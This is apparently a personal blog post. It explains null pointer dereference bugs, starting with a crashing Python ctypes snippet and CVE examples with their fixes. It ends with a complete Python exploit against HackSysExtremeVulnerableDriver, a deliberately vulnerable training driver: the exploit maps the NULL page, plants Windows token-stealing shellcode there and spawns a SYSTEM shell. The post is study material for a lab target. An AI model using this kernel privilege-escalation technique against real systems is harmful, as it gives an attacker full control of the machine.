Null deferences: user and kernel(land) review

This is nothing new, just a bit of mind clearing and idea organizing exercises for me. But you're welcome to read it and steal some of the sources I'll be mentioning.

~ Synopsys ~

In this post I will be first starting with a vulnerability I found in code posted in a Python mailing list. The vulnerability is known as Null dereferencing, and as you may know if you've been in this field for a while, it's extremely popular.

I will be continuing on how this vulnerability could be exploited on different forms depending on what the developer(s) do with the code I found it in.

To finish the post, I will be introducing some more concepts and wondering what would happen if, instead of being found in a simple program, it was found inside a kernel module. I will be writing an exploit to finish things off through HackSysExtremeVulnerableDriver.

Part 1: User mode

~ Introduction ~

+ The buggy code 

It all started one foggy, rainy morning..

No but seriously.
I was working on a python script which happened to include the ctypes module and found that I needed a file descriptor for a directory and, sadly, python doesn't have C's implementation of dirfd,, so I had to do my research.
After googling for a while, I ended up finding this mailing list where a user with the same problem as I had threw the question out to the public 10 years ago. Another user answered him providing the answer which would kinda mark the end of the thread.
How damaging could this be? It depends on how many people used it and how they used it. And considering it was the first result I got when searching for directory fd in python, I'm going with quite a few people.

When I copied the code and tried to implement it in my own script, everything went well and it did what it had to do. But then I decided to start fuzzing it a bit, just to see how it responded. It really didn't take much for it to give me a segfault.
'What, a segfault, why?'
I don't know why, let's look at what "I" had:

from ctypes import *
import sys


class c_dir(Structure):
    """Opaque type for directory entries, corresponds to struct DIR"""

def get_directory_file_descriptor(directory):
    c_dir_p = POINTER(c_dir)
    c_lib = CDLL("libc.so.6")
    opendir = c_lib.opendir
    opendir.argtypes = [c_char_p]
    opendir.restype = c_dir_p
    dirfd = c_lib.dirfd <-- 1
    dirfd.argtypes = [c_void_p]
    dirfd.restype = c_voidp
    closedir = c_lib.closedir
    closedir.argtypes = [c_dir_p]
    closedir.restype = c_int

    dir_p = opendir("%s" % directory) <-- 2
    print ("dir_p = %s:%r" % (directory, dir_p))
    dir_fd = dirfd(dir_p)
    print("dir_fd = %r" % dir_fd)
    print ("closed (rc %r)" % closedir(dir_p))

get_directory_file_descriptor(sys.argv[1])


See it yet?
At first I was convinced the fault was only in dirfd, but I couldn't see what exactly was going inside and why the stack trace returned as

(gdb) bt
#0  dirfd (dirp=0x0) at ../sysdeps/posix/dirfd.c:27

[...]
 

So it HAD to be in dirfd, right?
No.
+ The python white knight 

I talked with one of the python maintainers and he told me a few interesting key points:

> "Your segfault isn't occurring when you load dirfd, it occurs when you call it on the result of opendir, when opendir returned NULL on failure (due to the non-existent directory you call it with). You didn't check the return value, and end up doing flagrantly illegal things with it."
> "Ctypes lets you do evil things that break the rules, and if you break the rules the wrong way, segfaults are to be expected. Check your return values (for Py2)"
> "Side-note: When replying to e-mails, don't include the quotes from the e-mail you're replying to; it just clutters the tracker."

Ok. Sorry.
And thanks.

+ Understanding and identifying the vuln 

The important bit is that now we know the bug: we're looking for something that doesn't exist if we opendir with unexpected parameters, as for example NULL or a string of nonsensical characters like "pigeonloaf".

$ python segmentation-fault.py 
$ python segmentation-fault.py pigeonloaf

Those two would end up in segmentation fault because opendir is not expecting any other thing than a directory, which in turn fails, returns a NULL and segfaults (dirp=0x0).

'Okay okay but why would it segfault when NULL, *why* did they make things like that?'
I will also include that a little bit further down this post.

The thing is that this is what we call a Null dereference or Unchecked return value vulnerability, and it's a very common problem when dealing with unchecked return values. OWASP actually has another entry for "Missing check against Null".It's specially scary when it's found in kernel modules, because that means that we could end up with privilege escalation, as we'll see.

~ Taking advantage of it ~

+ Going over some cases 

So the first thing that I wanted to share is some cases which had snippets of code that made them have this type of vulnerability, even if we're still not in the kernel case, which we'll explore in a bit.

In this case we'll go over two of them, but I will list a few afterwards, just in case you want to check them yourself. Alternatively you can google "null dereference cve" or similar and explore the different links.

- The DNSmasq case

In this example, a user provided a vulnerability he/she found in the source code for the dnsmasq program. In it, you can read how this person found that a function called skip_question() is not checking for an error (and as we said before, error would be returning NULL). Because m = skip_question() - header pointer, if skip_question() ended up in an error and returned NULL, that would mean that header would end up being a negative value.

Further investigation lead this person to find out that if m < 0xffffffff80000000, the heap can be read by an exploiter.
I really liked this case because it shows that this vulnerability will not always end up in only DoS. The affectation of the vuln depends on the conditions of the program and its environment.

- The FFmpeg case

In this other one, this guy crafted a mov file (how he did it, he doesn't say, but if you find out let me know) which set the value to pc->buffer to NULL.
We know what happens if you don't check on error/NULL values, we've been there. And so, the same segfault happened. NVD link.
XPath case and Exempi case.

+ Fixing it

So if you have checked the NVD link for the FFmpeg case, you can see that there is a link to their Github account in which they patched this buggy snippet (commit).
As you can see, the way they fixed it is by swapping the return in line 92 (the one in red) by a continue in line 92 (in green), and this way if remaining results in error, it will just keep looping instead of returning the value of dctx->remaining with the error in it.

Then how could we fix the vulnerable code we found in that mailing list?
Well, in this specific case, we can check if the supplied value is actually a directory by first importing os in the beginning:
import os

And then, right after entering our function, check if it's actually a directory:
if os.path.isdir(directory) == False:
        print("That's not a directory. Are you okay buddy?")
        sys.exit(-1)


And that's pretty much all for this specific case and with this specific input type.
Just a matter of keeping an eye on inputs while you add more functionality to your programs/scripts.

Part 2: Jumping inside the kernel

Oh well here we go. This is the fun(?) bit :)

~ How the kernel handles null pointer and what mmap does ~

So before digging into it, maybe a little bit of basics just in case you don't know how the kernel handles NULL pointers or what is mmap and how it works very superficially.

NULL pointers

A NULL pointer is a special type of pointer which doesn't point to an object or function, but has the same byte-size as a normal pointer would and compares equal to pointers whose value is also null.

The operating system sets up null pointers so that accessing them, whether it's writing or reading values, will result in a segmentation fault. The NULL pointer is a reserved constant value.

As C11 defines it:

"An integer constant expression with the value 0, or such an expression cast to type void *, is called a null pointer constant."

NULL is *typically* defined as a set of 0's, but it doesn't always need to be like that, it just usually is. It depends on the implementation which is following.
However, because each application/program has its own address space and we can do whatever we want with it, we can also declare NULL as a valid address, a.k.a mapping the NULL page (or declaring that that area of memory should map to some piece of physical memory, which also introduces the virtual memory subject; and I'll assume that you've read that link or went over the links referenced at the end which I really recommend too).

mmap

What do we want to know mmap for? Well, because that's the function that UNIX systems use for mapping regions of memory. And because mapping to the null page is disallowed in those systems, it will be useful to change it so it's allowed.

I think now's a good time to say that don't do this on your own machine, use a virtual machine, don't be silly.

~ Null dereferences inside kernel modules ~

So this vulnerability is found e-v-e-r-y-w-h-e-r-e and all the time, and to prove that I included three recent cases (the oldest one is from 2016) which reported that vulnerability, this time is found in the kernel.
1. Apple MacOSX 
2. Redhat
3. Linux kernel

As you can see from the last one, the Linux kernel one, we're pretty much looking at the same thing as the non-kernel ones, it just happens to be in the kernel this time. For example, if we go to the github commit where they fixed that vulnerability:

if (rs->rs_bound_addr == 0 || !rs->rs_transport) {

They only needed to check for its existence. So it sticks with the definition of "a null pointer dereference is where we're dealing with empty or invalid values which are overlooked".
If rs->rs_bound happened to be non-existent, an error or negative, it would return a NULL value, which before the commit, was not an option, so an unhandled NULL value was passed as a parameter, whereas now it will stop the flow of execution. And that is exactly what I found in the code on the first mailing list (kinda).

~ From hero to zero ~

For this example, I will be using the HackSysExtremeVulnerableDriver,which is a pretty dank vulnerable driver written by hacksysteam which holds a lot of different vulnerabilities to practice and understand.

I found to be very useful the blog post written by FuzzySecurity about how to set up the driver inside a Windows machine from a Windows host. Also please check out Hasherezade's post about it if you're really going to do it, she totally saved my ass in more than one occasion when I didn't have a clue on what was wrong with my set up. Hers is a must.

On the other hand, I got mostly based on Rootkit's exploit, mainly because it was in Python and I wanted to write my exploit in Python.
  
The first thing I'm going to go with is to go over NullPointerDereference.c that hacksysteam uploaded into his repo. 

The interesting bit starts to happen at line 74, which by today is the beginning of the function TriggerNullPointerDereference().
1. ProbeForRead: as the comment says, it tests if we're still in user mode. "(...) checks that a user-mode buffer actually resides in the user portion of the address space (...)".
2. ExAllocatePoolWithTag: it will allocate a pool of memory and return a pointer to this pool.The last element, the Tag is a string of up to four characters and usually specified in reverse order. Here the Tag (the last element) is POOL_TAG.

If this second function is unsuccessful, if (!NullPointerDereference) will end it.
But if it is successful, we'll get a set of strings which will help us debug later and find out some relevant information.

Then, in the next if (line 115), it compares UserValue to MagicValue, if they are equal execution proceeds as usual. If it's not, (and that's the part that interests us), a sort of "stack trace" will be printed by the debugger.

+ The exploit

import sys
import ctypes
from ctypes import *
from subprocess import *

magicValue = "\x37\x13\xD0\xBA"
lenMagicValue = len(magicValue)

GENERIC_READ_WRITE = 0xC0000000
FILE_SHARE_READ_WRITE = 0x00000003
OPEN_EXISTING = 0x3
FILE_ATTRIBUTE_NORMAL = 0x80
PAGE_EXECUTE_READWRITE = 0x40
BASE_ADDRESS = 0x1
REGION_SIZE = 0x100
MEM_COMMIT_RESERVE = 0x3000

def theExploit():
   
    shellcode = bytearray(
        "\x90\x90\x90\x90"              # NOP Sled
        "\x60"                          # pushad
        "\x64\xA1\x24\x01\x00\x00"      # mov eax, fs:[KTHREAD_OFFSET]
        "\x8B\x40\x50"                  # mov eax, [eax + EPROCESS_OFFSET]
        "\x89\xC1"                      # mov ecx, eax (Current _EPROCESS structure)
        "\x8B\x98\xF8\x00\x00\x00"      # mov ebx, [eax + TOKEN_OFFSET]
        "\xBA\x04\x00\x00\x00"          # mov edx, 4 (SYSTEM PID)
        "\x8B\x80\xB8\x00\x00\x00"      # mov eax, [eax + FLINK_OFFSET]
        "\x2D\xB8\x00\x00\x00"          # sub eax, FLINK_OFFSET
        "\x39\x90\xB4\x00\x00\x00"      # cmp [eax + PID_OFFSET], edx
        "\x75\xED"                      # jnz
        "\x8B\x90\xF8\x00\x00\x00"      # mov edx, [eax + TOKEN_OFFSET]
        "\x89\x91\xF8\x00\x00\x00"      # mov [ecx + TOKEN_OFFSET], edx
        "\x61"                          # popad
        "\xC3"                          # ret
    )

    shellcodeLen = len(shellcode)
   
    try:
        kernel32 = windll.kernel32
        ntdll = windll.ntdll
       
        maliciousDriver = kernel32.CreateFileA(
            "\\\\.\\HacksysExtremeVulnerableDriver",
            GENERIC_READ_WRITE,
            FILE_SHARE_READ_WRITE,
            None,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            None)
       
        ptr = kernel32.VirtualAlloc(
            0,
            shellcodeLen,
            0x3000,
            PAGE_EXECUTE_READWRITE)
       
        buff = (c_char * len(shellcode)).from_buffer(shellcode)
       
        kernel32.RtlMoveMemory(
            ptr,
            buff,
            shellcodeLen)
               
        nullPage = ntdll.NtAllocateVirtualMemory(
            0xFFFFFFFF, # https://stackoverflow.com/questions/5818173/why-does-getcurrentprocess-return-1
            byref(c_void_p(BASE_ADDRESS)),
            0,
            byref(c_ulong(REGION_SIZE)),
            MEM_COMMIT_RESERVE,
            PAGE_EXECUTE_READWRITE)
       
        if nullPage != 0x0:
            print("Couldn't allocate NULL page: %r" % nullPage)
            sys.exit(-1)

        if not kernel32.WriteProcessMemory(0xFFFFFFFF, 0x4, byref(c_void_p(ptr)), 0x40, byref(c_ulong())):
            sys.exit(-1)

        kernel32.DeviceIoControl(
            maliciousDriver,
            0x22202b,
            magicValue,
            lenMagicValue,
            None,
            0,
            byref(c_ulong()),
            None)

        Popen("start cmd", shell=True)

    except Exception as e:
        print("Error! %s" % e)
        sys.exit(-1)

if __name__== "__main__":
    theExploit()


+ Discovering the exploit

Like everyone else, I thought it might be a good idea to take a look at the vulnerable driver with IDA Pro 7, where I found interesting things.

When we load the driver, we're greeted with an ASCII title "HEVD", and afterwards the debugging symbols continue when we execute the vulnerable function, whether we trigger the null dereference or not.
Take a look at the strings under it. Do you remember how ExAllocatePoolWithTag has a tag of up to four characters that are in reverse order? Can you see what's written in '[+] Pool Tag' ? Also check out the string in '[+] UserValue'.


That offers some clues as to where to start searching, like for some strings which could aid us to find the vulnerable function that gets called to print those strings and where we can find some of the information we needed to build the exploit.


Ah so there are the strings. It would be a great idea to follow the bread crumbs and just look a bit further up, to see what led us there,


That was before the previous image. EAX is zero then? What if we look up a little bit more...


And up a bit more...


And that's it! Well not really, because EAX starts by being equal to 22201Fh. Let's just write it down:
  1. EAX = 22201Fh
  2. We move EDX to EAX. We don't know what's in EDX.
  3. We substract 222023h to EAX. 0x00222023 - 0x0022201F = 0x4
  4. If that last subtraction is zero, the vulnerability is not triggered. So let's pretend that it's not zero, that the subtraction is another thing like the 0x4 we got.
  5. We're now in 0x000151AF, where we push 4 to the stack.
  6. As you can see, there is a PUSH 4; POP ECX; that means we pop the last value that ECX held and place 0x4 in ECX instead. So ECX has now the value 0x4 in it. Cool beans.
  7. Okay now if we subtract 0x4 (ECX) from something (EAX) and the result is not zero... we most def not jump where we would if it was zero :D Okay but seriously, we need to keep the values not zero if we want to trigger the "fault", so let's pretend.
  8. Once again, we subtract 0x4 (ECX) from EAX, and this time if it is zero, then we'll jump into the null pointer fault.
With all that small analysis, if we look again at the exploit, we can see the string \x37\x13\xD0\xBA as the magicValue. So what's that? Look again at the debugging strings printed. There's something that goes by the name "UserValue", which we set to 0xBADO1337 in the exploit.


Just look at the last yellow highlighted rectangle. Huh? That's comparing BAD0B0B0 to EAX, and EAX has the UserValue. And if it's not equal, then the Null Pointer dereference exploit is triggered.
That's why magicValue is necessary.

Yeah okay but what's up with the 0x4 mess that was explained before?
In short:


It's calling something in ESI+4, and that's the position where we want to insert the shellcode at, because that's the position that we now control.

In long: take a look at the links and references.


~ Bibliography ~

Oracle - Introduction to virtual memory (part1)
Oracle - Exploiting a kernel NULL dereference (part2)
LNW - Fun with NULL pointers (part1)
LNW - Fun with NULL pointers (part2)

GeeksforGeeks - NULL pointer in C
CPPreference - Pointer declaration
Rootkits - Kernel Null Pointer Dereference
Ch3rn0byl - The wonderful Null Dereference

Comments

Popular Posts